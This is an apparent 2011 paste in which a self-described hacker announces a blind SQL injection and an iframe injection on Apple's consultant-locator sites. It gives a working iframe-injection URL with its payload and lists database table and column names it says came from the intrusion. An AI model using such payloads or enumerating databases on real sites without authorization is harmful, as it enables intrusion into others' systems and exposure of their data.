SHARE
TWEET

Untitled

a guest Jul 3rd, 2011 4,852 Never
  1. Apple.com
  2.  
  3. Hello
  4. I am Idahc(lebanese hacker) I found a Blind SQLI and Iframe Injection on Apple
  5. I am not one of Anonymous or Lulzsec
  6. and I am against The ANTISEC OPERATION
  7.  
  8. BUt this is a poc with not confidential information
  9.  
  10. I didn't dump users,emails,passwords........
  11.  
  12.  
  13. Iframe Injection : https://consultants.apple.com/au/locator_results.php?sl="><iframe src=http://www.google.fr>
  14.  
  15. Blind SQL INjection: -->http://consultants-locator.apple.com/
  16.  
  17.  
  18. DATABASE = APPLE
  19.  
  20. Table_name of Apple  :
  21.  
  22. address
  23.  
  24. application
  25.  
  26. application_company_relationship
  27.  
  28. application_geocoverage
  29.  
  30. application_option
  31.  
  32. applicaion_routing
  33.  
  34. attachment
  35.  
  36. auth_company_permission
  37.  
  38. auth_user_default_permission
  39.  
  40. auth_user_permission
  41.  
  42. catalog_category
  43.  
  44. catalog_discount
  45.  
  46. catalog_order
  47.  
  48. catalog_order_product
  49.  
  50. catalog_product
  51.  
  52. catalog_product_category
  53.  
  54. catalog_product_discount
  55.  
  56. catalog_product_mdf_campaign
  57.  
  58. catalog_product_mdf_fund
  59.  
  60. catalog_prodpcu_product
  61.  
  62. catalog_product_rating
  63.  
  64. class_field_input
  65.  
  66. company
  67.  
  68. comapny_address
  69.  
  70. ........more
  71.  
  72.  
  73. Column_name of address
  74.  
  75. addressID
  76.  
  77. alphabetID
  78.  
  79. label
  80.  
  81. street
  82.  
  83. city
  84.  
  85. state
  86.  
  87. postale
  88.  
  89. countryId
  90.  
  91. phone_number
  92.  
  93. phone_fax
  94.  
  95. latitude
  96.  
  97. longitude
  98. .....
RAW Paste Data
Top